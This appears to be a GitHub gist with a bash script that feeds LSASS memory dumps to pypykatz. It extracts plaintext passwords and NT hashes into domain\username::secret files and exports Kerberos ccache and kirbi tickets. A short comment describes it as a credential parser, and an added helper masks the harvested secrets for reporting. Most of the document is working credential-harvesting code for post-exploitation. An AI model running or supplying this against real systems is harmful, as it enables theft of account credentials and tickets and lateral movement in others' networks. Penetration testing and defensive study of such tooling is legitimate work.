@seajaysec
Last active January 21, 2024 00:03
super rough plaintext secret parser for pypykatz dumps
#!/bin/bash
# prereqs: pypykatz, all the dumps in current working dir
mkdir -p ./ppktz_tickets
ext='.dmp'
for i in *"$ext"; do
    [ -e "$i" ] || continue   # glob matched nothing: no dumps in this dir
    txtfile="${i::-3}txt"
    secrets="${i::-3}secrets"
    # text report per dump; -k is the output dir for ccache and kirbi tickets
    pypykatz lsa minidump "$i" -o "$txtfile" -k ./ppktz_tickets/
    # plaintext: join each non-None password line with the line before it as <name>::<password>
    grep 'password' "$txtfile" -B 2 | grep -v 'None' | grep 'password' -B 1 | sed -e "s#--##g" | sed '/^$/d' | sed '$!N;s/\n/ /' | sed 's/username //g' | sed 's/password /::/g' | tr -d '[:blank:]' | sort -u > "$secrets"
    # NT hashes: group three fields per record, reorder to domain\username::nthash, drop lines containing '$'
    grep 'NT:' "$txtfile" -B 3 | grep -v "LM: NA" | cut -d ":" -f 2,3 | sed -e "s#--##g" | sed '/^$/d' | tr -d '[:blank:]' | sed 's/NT://g' | awk '{ printf "%s", $0; if (NR % 3 == 0) print ""; else printf ":" }' | awk -v OFS=":" -F":" '{print $2, $1, $3}' | sed 's/:/\\/' | sed 's/:/::/' | grep -v "\\\$" | sort -u >> "$secrets"
    sort -u "$secrets" -o "$secrets"
done
# deletes empty secrets files
find . -maxdepth 1 -type f -name '*.secrets' -empty -delete
# totals; cat/find are used so a single file or an empty result still prints a count
echo 'plaintext and hash output:' && cat ./*.secrets 2>/dev/null | wc -l
echo 'ccache tickets output:' && find ./ppktz_tickets -type f -name '*.ccache' | wc -l
echo 'kirbi tickets output:' && find ./ppktz_tickets -type f -name '*.kirbi' | wc -l

seajaysec commented Sep 20, 2019

takes raw lsass output files, uses pypykatz to output text, greps out plaintext creds and NTLM hashes, then sorts for uniques. includes pypykatz flags to output ccache and kirbi tickets as well.

output format:
domain\username::password
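
The `.secrets` lines hold live credentials, so they need masking before they go into a report or ticket. The following is an added example, not part of the gist: `redact_secrets` is a hypothetical helper that splits each line on the first `::` (an assumption about the format above) and masks the secret; the sample records are constructed.

```bash
#!/bin/bash
# Added example, not from the gist. redact_secrets is a hypothetical helper.
# Input: lines in the gist's output format, domain\username::password
# Assumption: the secret is everything after the FIRST "::" on the line,
# so a password that itself contains "::" is kept whole.
redact_secrets() {
    awk '{
        sep = index($0, "::")
        if (sep == 0) {
            # never echo an unparsed line, it may still contain a secret
            printf "MALFORMED\tline=%d\n", NR
            next
        }
        account = substr($0, 1, sep - 1)
        secret  = substr($0, sep + 2)
        n = length(secret)
        # 32 hex characters is treated as an NT hash, anything else as plaintext
        kind = (n == 32 && secret ~ /^[0-9a-fA-F]+$/) ? "nt_hash" : "plaintext"
        # keep two characters at each end only when the secret is long enough
        masked = (n >= 8) ? (substr(secret, 1, 2) "***" substr(secret, n - 1)) : "***"
        printf "%s\t%s\t%s\tlen=%d\n", account, kind, masked, n
    }'
}

# Constructed sample records (not real credentials)
printf '%s\n' \
    'CORP\alice::Summer::2019!' \
    'CORP\bob::0123456789abcdef0123456789abcdef' \
    'CORP\carol::pw1' \
    'not a secrets line' | redact_secrets
```

Output is tab-separated: account, secret type, masked secret, secret length.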
